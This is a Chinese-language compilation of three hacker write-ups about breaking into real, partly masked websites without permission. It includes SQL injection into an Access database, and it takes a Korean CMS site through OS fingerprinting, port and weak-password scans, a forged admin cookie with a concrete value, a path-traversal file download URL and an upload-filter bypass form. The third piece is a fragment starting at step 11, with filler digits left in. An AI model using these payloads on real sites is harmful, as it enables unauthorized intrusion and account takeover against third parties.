以下是小编整理的对易语言同服某站的检测,本文共3篇,欢迎阅读与收藏。本文原稿由网友“Velvet”提供。
篇1:对易语言同服某站的检测
对于一些新来的灰阔都喜欢用易语言,想必易语言的数据库也是相当的有价值的.
这次只是没什么兴趣了.放出下过程,
403拒绝访问?
好吧我们继续
随便点击了几个链接,加入单引号发现存在注入,不过是access的,
果断丢给啊D跑。管理表段跑不出。。这时候压力啊。。
看到了目录dayou,该不会是dayou_admin吧。。
试了下成功了。。
这次审计到这边就因为私人的事情而结束了.
希望易语言官方看到关闭这个没用的站点吧
篇2:对韩国某CMS的一次安全检测
某日,一个做网页设计的朋友发给我一个站(www.ba******.net),问我感觉如何?该网站设计漂不漂亮?明明知道我在艺术方面不太擅长,尤其是美感设计,还发过来,不过既然发过来了,也要上去看看,打开网站后,感觉还是蛮简洁的,如图1所示,就看看它的安全性如何,
图1韩国某网站CMS界面一、服务器信息收集
1.获取IP信息
直接打开DOS提示符操作窗口,使用ping命令,对网站www.b*******.net进行ping操作,如图2所示,获取IP地址为“221.***.**.21”,且无丢包现象,延迟时间也较少,呵呵,感觉韩国的计算机就是爽,速度快,硬件配置也高。
图2获取网站IP地址安全小知识
(1)TTL术语
TTL是Time to Live对缩写,它是IP协议包中的一个值,它告诉网络路由器包在网络中的时间是否太长而应被丢弃。有很多原因使包在一定时间内不能被传递到目的地。例 如,不正确的路由表可能会导致包的无限循环。一个解决方法就是在一段时间后丢弃这个包,然后给发送者一个报文,由发送者决定是否要重发。TTL的初值通常 是系统缺省值,是包头中的8位的域。TTL的最初设想是确定一个时间范围,超过此时间就把包丢弃。由于每个路由器都至少要把TTL值减一,TTL通常表示 包在被丢弃前最多能经过的路由器个数。当记数到0时,路由器决定丢弃该包,并发送一个ICMP报文给最初的发送者。
TTL是指定数据报被路由器丢弃之前允许通过的网段数量。通常是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。
使用PING时涉及到的 ICMP 报文类型
一个为ICMP请求回显(ICMP Echo Request)
一个为ICMP回显应答(ICMP Echo Reply)
(2)TTL值
TTL 字段值可以帮助我们识别操作系统
类型,下面是一些常见系统的TTL值:(1)UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255;
(2)Compaq Tru64 5.0 ICMP 回显应答的TTL字段值为64;
(3)微软 Windows NT4 WRKS、Windows NT4 Server、Windows 、Windows XP操作系统 ICMP 回显应答的 TTL字段值为128;
(4)微软 Windows 95、Windows98、Windows98SE、Windows ME操作系统ICMP 回显应答的TTL字段值为 32;
(5)一些特殊情况下,其TTL值会有一些不同:
LINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64
FreeBSD 4.1, 4.0, 3.4;Sun Solaris 2.5.1, 2.6, 2.7, 2.8;OpenBSD 2.6, 2.7;NetBSD;HP UX 10.20等等ICMP 回显应答的TTL字段值为255;
从返回的TTL值中,可以初步判定目标主机是linux系统。
防护技巧
在一般意义上可以通过“ping 主机地址”或者“ping 网站域名地址”来获取TTL值,通过TTL值来判断网站所在主机的操作系统类型。一些防护严格的系统会自定义TTL值,从而让入侵者无法通过TTL值来获取操作系统的类型。TTL值的注册表位置
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255,
例如本人的计算机的TTL值就是 127,如图3所示,嘿嘿,从常见的TTL值你就无法知道!
图3 自定义TTL值注意:
修改TTL值后需要重启计算机才能生效,不同计算机操作系统可能修改的TTL值地方不一样,一般情况下是去注册表
“HKEY_LOCAL_MACHINE\\SYSTEM \\CurrentControlSet001\\Services\\Tcpip\\Parameters”下修改DefaultTTL的值,如果是在 “HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters”中 则需要新建“DefaultTTL”键,且类型为DWORD。
2.获取服务器架构信息
通常通过在浏览器中输入“221.139.***.21/antian365/”地址,其中“antian365”为不存在的目录, 从返回出错的信息中来判断服务器架构信息,如图4所示,可以看出来系统使用的是apache1.3.36,因为小站根本是使用免费的Mysql数据库,所 以可以确认是典型的LAMP架构。
图4获取服务器架构信息说明:
(1)221.139.***.21/antian365/如果是在IE浏览器输入,一定要把显示友好HTTP错误信息去掉,具体操作:选择IE浏览器--工具--Internet选项;在高级选项框中将“显示友好HTTP错误信息”的勾选去掉,这样才能显示详细的错误信息。
LAMP架构网络小知识
LAMP是一种Web网络应用和开发环境,基本上是四种开源软件技术的组合,它们组合在一起产生了一个功能强大的应用服务平台,使用却相对来说比较简单和容易。
LAMP是基于Linux,Apache,MySQL和PHP的开放资源网络开发平台,这个术语来自欧洲,LAMP名字取自每个程序的第一个字母, 也有人认为LAMP是一种Web网络应用和开发环境,是Linux, Apache,MySQL, Php/Perl的缩写,每一个字母代表了一个组件。其实LAMP这个词的由来最早始于德国杂志“c't Magazine”,Michael Kunze在1990年最先把这些项目组合在一起创造了LAMP的缩写字。
这些组件并不是开始就设计为一起使用的,由于开源和免费,随着越来越多的人使用它,其兼容性不断改善和完善,因此逐渐成为Web应用程序开发的一种 架构。在这个架构中每个程序在所有权里都符合开放源代码标准:Linux是开放系统;Apache是最通用的网络服务器;MySQL是带有基于网络管理附 加工具的关系数据库;PHP是流行的对象脚本语言,它包含了多数其它语言的优秀特征来使得它的网络开发更加有效。
有时候,开发者在Windows操作系统下使用这些Linux环境里的工具称为使用WAMP,也称为WAMP架构。 随着开源潮流的蓬勃发展,开放源代码的LAMP已经与J2EE和.Net商业软件形成三足鼎立之势,并且该软件开发的项目在软件方面的投资成本较低,因此 受到整个IT界的关注。有关LAMP的更多知识,可以查看“LAMP架构帖子”www.antian365.com/bbs /viewthread.php?tid=2639&extra=page%3D1&frombbs=1
3.探测端口信息
用sfind扫一下服务器,发现只开启21,80端口,如图5所示,其中3306Mysql数据库端口也可以进行探测。
图5端口信息之后使用HScan软件扫描Mysql数据库和FTP弱口令,没有结果。看来还是得从web程序入手
篇3:对韩国某CMS的一次安全检测
11.cookie欺骗成功
先看看可否使用UPDATE更新管理员密码,先看一下源代码:33333333333333333333
if ($MB_ID == 'ROOT' && $MB_PW != '')
{
include '../conf/mkpass.php';
$crypt_key = “ml5300a”;
$INPUT_PASS = crypt($MB_PW,$crypt_key);
if ($INPUT_PASS == $ROOT_PASS)
{
setcookie(“MyLootPass” , $ROOT_PASS , 0 , “/”);
getTargetLink(“../index.php”,“”,“”);
} else { echo“”; }
}
这个不是可以cookie欺骗吗?于是打开桂林老兵的mybrowse,打开网站后,点击自定义cookie,把cookie修改为:
MyLootPass=mldzOtDVllwqw;PHPSESSID=ae92f7f6cd637f942071b67b8f4881ad,然后刷新一下页面,显示已登录(看左上角),如图18所示,
图18 cookie欺骗成功12.得到前台可上传页面
这个是前台管理员,在前台管理中,有发公告的地方,并可以上传文件,如图19所示。
图19 有上传可利用管理页面13.上传php文件受限
后台对文件类型做了一些限制,当我选择php文件时,却弹出一个对话框,如图20所示。
图20限制上传php文件在没有提交上传的时候,就跳出来对话框,说明肯定本地使用Javascript做了验证,所以可以自己构造一个上传表单来突破,于是先下载上传处理文件upload.php文件。构造其地址:
www.b****k.net/ez/bbs.php?table=sub1&action=down&where=dat&dtype=up&uid=133&file=
../../../../bbs/lib/module/upload/upload.php,下载到本地后打开该文件查看其源代码:4444444444444444444
if ($action == “upload”)
{
if(is_uploaded_file($HTTP_POST_FILES[upFile][tmp_name]))
{
$upFile_Ext = explode('.' , $HTTP_POST_FILES[upFile][name]);
if (strstr(“html,php3,inc,asp,jsp” , $upFile_Ext[sizeof($upFile_Ext)-1]))
{
echo “”;
exit;
}
$filesize = $HTTP_POST_FILES[upFile][size];
……(略去无关代码)
if (is_file(“../../../table/$table/upload/”.$HTTP_POST_FILES[upFile][name])) {
$upname = date(“His”).“_”.$HTTP_POST_FILES[upFile][name];
move_uploaded_file($HTTP_POST_FILES[upFile][tmp_name],
“../../../table/$table/upload/”.$upname);
}
else {
$upname = $HTTP_POST_FILES[upFile][name];
move_uploaded_file($HTTP_POST_FILES[upFile][tmp_name],
“../../../table/$table/upload/”.$upname);
}
}
好象可以上传PHP文件的,先构建一个上传表单,代码如下:
“www.b****k.net/ez/bbs/
lib/module/upload/upload.php” target='Tmp_Up_Iframe' >
(INPUT type=hidden value=upload name=action)
(INPUT type=hidden value=sub1 name=table)
(INPUT type=hidden value=200 name=MaxUp_Size)
(INPUT type=file name=upFile)
(INPUT type=submit value=提交 name=SubmitBtn)
用时将( ) 改为< >
另存为upload.htm,再次选择一个php文件上传试试,发现并不能上传,如图21所示,
图21还是不能上传php文件于是上传一个gif.phP文件(linux服务器是区分大小写的)。上传成功后,用IE浏览器浏览(不要用Firefox,不然图片也会变成下载)www.b****k.net/ez/bbs/table/sub1/upload/gif.phP
,但发现是出现下载页面,服务器不解释。如图22所示。图22不解释phP文件再看一看strstr函数的解释。
语法: string strstr(string haystack, string needle);
本函数将 needle 最先出现在 haystack 处起至 haystack 结束的字符串返回。若找不到 needle 则返回 false。
原来只要文件名后缀包含php3、php、ph、p等类型都不行。没折了,不搞了。
谁知道有什么办法突破,请告知我。
说明:验证个人认为,使用session验证比cookie安全些;还有就是对上传文件格式的验证,一定要在服务器端进行,在客户端验证的话,随便自己在本地构建一个表单就可以轻轻松松绕过了。
三、总结与收获
通过本次对韩国某CMS系统网站进行检测,用到了LiveHTTPHeaders、RefControl插件,通过这些插件来辅助进行安全检查,其 效果还是非常明显的,在本次检测中成功进行突破防盗链、进行了cookie欺骗,对php类型的网站安全检查应该是多了一些实际经验。欢迎跟我进行技术探 讨,我在antian365.com论坛中的id是N3tl04D。